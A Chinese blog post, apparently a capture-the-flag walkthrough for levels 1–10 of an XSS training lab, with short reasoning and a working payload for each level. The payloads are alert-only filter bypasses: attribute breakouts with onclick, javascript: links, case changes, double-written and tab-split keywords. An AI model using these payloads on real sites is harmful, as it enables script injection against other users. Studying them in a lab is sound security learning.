XSS闯关挑战1-10

最新推荐文章于 2025-03-23 21:48:49 发布

原创最新推荐文章于 2025-03-23 21:48:49 发布 · 415 阅读

7 ·

CC 4.0 BY-SA版权

文章标签：

#运维 #安全 #网络

网络安全学习专栏收录该内容

34 篇文章

订阅专栏

1

观察页面，发现页面没什么可利用的漏洞

但是url是？传参的类型，可以试试有没有xss漏洞

<script>alert(/xss/)</script>

2

输入1的脚本发现没效果，看一下源代码，发现传入到value后是变成了字符串的形式，咱们就让他不是字符串

<input name=keyword  value="  "><script>alert(/xss/)</script>"  ">

3

可以看到尖括号被过滤了

我们可以试试其他的可以弹出提示框的事件

'  onclick='alert(/xss/)

还有以下常用事件

mouseup  鼠标释放时触发
mousedown  鼠标按下时触发
mousemove   鼠标移动时触发
mouseout     鼠标离开时触发

4

过滤掉尖括号，以及用字符串

"  onclick="alert(/xss/)

5

发现他过滤了事件，且大写也不行

我们可以用链接

"> <a href = 'javascript:alert(/xss/)'>click me</a>"

6

用大写

"> <a HREF = 'javascript:alert(/xss/)'>click me</a>"

7

过滤掉了href和script

"><scrscriptipt>alert(/xss/)</scrscriptipt>"

8

想办法绕过

这里用制表符将script隔开

javascr%09ipt:alert(/xss/)

9

提示连接不合法

在输入中输入url

javascr%09ipt:alert('http://www.qq.com')

10

有三个input，试着传参

只有t_sort可以传参

发现输入事件无响应

试着加个按钮，成功了

t_sort=dd" type="button" onclick="alert(/xss/)

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Valder__

关注关注

5
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

《从0到1：CTFer成长之路》书籍配套题目-[第二章 web进阶]XSS闯关

weixin_46703850的博客

02-23

1829

《从0到1：CTFer成长之路》书籍配套题目，来源网站：[《从0到1：CTFer成长之路》](https://book.nu1l.com/)

XSS-labs（1-10）闯关详解

m0_46467017的博客

07-25

3246

通过查看可以知道本关与上一关的不同，在于转换后的内容不同，虽然添加了大小写转换，但是因为转换后，字符被转换为空字符，所以转换后的字符如何仍可以组合成，那么就可以绕过该防御机制。进入第八关后，发现无法构造闭合，采用是采用了htmlspecialchars($str)函数，而且闭合方式是双引号，所以input中无法注入，但是在连接里面是有地方可以注入的。右键查看源代码，发现我们输入的>,.........

参与评论您还未登录，请先登录后发表或查看评论

BuuCTF[第二章 web进阶]XSS闯关

m_de_g的博客

07-27

7425

** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明我们需要执行alert函数那就开启闯关模式，第一关，一看这个URL就很奇怪没直接上手，二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡，是由level1，level2…,我

BUUCTF[第二章 web进阶]XSS闯关

2301_78136321的博客

09-26

1069

alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)

1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md

08-10

一些关于xss的payload

[第二章 web进阶]XSS闯关

qq_51558360的博客

03-04

2341

level1 ?username=<script>alert(1)</script> level2 查看源码我们可以看到username被escape函数编码了，基本上就很难绕过。因此我们从username本身想办法。可以这样构造： ?username=';alert(1);// 这样username就是这样： var username = ‘’;alert(1);//’; 成功执行了alert(1)。 level3 输入上一关的payload 题目源码，这次过滤了单引

xss闯关挑战

11-09

这个是XSS闯关文件，解压后放在服务器的对应文件夹即可。闯关笔记我博客中有记录，新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...

xss闯关记录 1-10超详细

weixin_44717303的博客

03-31

870

xss挑战过关教程挑战关卡准备环境第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关准备环境首先需要一个 xss通关挑战源码需要准备一个PHPstuday 最后需要一台可以正常联网的电脑第一关没有任何保护随便一条脚本语句均可 <a href=javascript:/00/,alert(%22M%22)>M</a> 第二关 "> <a href=javascript:/00/,alert(%22M%22)>M</a>// 对比

XSS-Labs 靶场 Level 0-10关卡 WriteUp

聚焦网络安全，以多元语言优势汲取知识，分享生动有趣的学习与技术心得。

03-23

957

今天，我花了大量时间通过 XSS-Labs 的挑战练习跨站脚本（XSS）漏洞。这次经历让我大开眼界，不仅让我理解了 XSS 的原理，还让我明白了作为一名开发者或安全专家，为什么要学习这些知识。为什么要学 XSS？XSS 是最常见的网络漏洞之一，也是最危险的漏洞之一。它允许攻击者向其他用户查看的网页中注入恶意脚本，从而窃取敏感信息，如 Cookie、会话令牌甚至登录凭证。了解 XSS 不仅能帮助开发者编写更安全的代码，还能保护用户免受潜在攻击。

新手打 XSS-level(1-13) 靶场心得和总结

m0_73992753的博客

07-13

1587

新手学习 XSS-level(1-13)练级

xss闯关

2401_87790882的博客

02-09

1194

BUU上的。

1.【BUUCTF】BUU XSS COURSE 11及XSS知识点

2401_86760082的博客

02-05

1660

XSS知识点 XSS攻击类型反射型XSS 存储型XSS DOM 型XSS XSS攻击危害 XSS攻击的注入点检测XSS漏洞

2025.2.5——三、[第二章 web进阶]XSS闯关 XSS|代码审计|符号转义|沙箱逃逸

2402_87387800的博客

02-06

1328

题目来源：BUUCTF [第二章 web进阶]XSS闯关。

BUUCTF [第二章 web进阶]XSS闯关

m0_49025459的博客

04-12

2141

题目第一关这一关没有过滤直接修改url就行 ?username=<script>alert('xss')</script> 第二关这一题样式没什么变化直接上源码 <html lang="zh"><head> <meta charset="UTF-8"> <title>XSS配套测试平台</title> <meta http-equiv="Content-Type"

WEB XSS跨站漏洞（详细版）

sinat_59974786的博客

10-13

298

本人事先声明，这些知识只是为一些想从事网络安全工程师的小伙伴，提供体系化的学习思路。如果学习者学习后，进行非法行为，与本人无关。告诫：对于一些兴趣学习者，低调学习，别瞎搞，容易喜提免费住宿大礼包。当你凝视深渊时，深渊也默默凝视着你。如果有错误的地方欢迎指正，作者在收到信息后会及时修正，并注明提出者，欢迎与作者共同学习。工具名字给你们了，最好去下载看看。

BUUCTF[第二章Web进阶]XSS闯关教程

DMXA的博客

11-01

1038

攻击方式：这种攻击多见于论坛、博客和留言板，攻击者在发帖的过程中，将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时，服务器接收该目标用户的请求并进行处理，然后服务器把带有XSS代码的数据发送给目标用户的浏览器，浏览器解析这段带有XSS代码的恶意脚本后，就会触发XSS漏洞。存储型XSS又称为持久型XSS，攻击脚本将被永久的放在目标服务器的数据库或文件中，具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS，它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS。

XSS漏洞靶场闯关

m0_65858385的博客

08-17

1418

boomer=<a id=ok href="javascript:alert(1337)">这里的意思是我们a这个标签，id=ok使得让后面href中的代码放在ok中2秒后自动执行，但这里我们使用的javascript没有任何变化是这个不在白名单内，我们就可以使用这个框架中的白名单中的一些协议，我在github中查到的有mailto、tel、cid、sms等……在action这里存在一个尾协议的事情，。"，这里jeff=后面跟的可以为其他的都没关系，主要是后面要进行一个闭合执行我们的alert(1337)

xss闯关1-20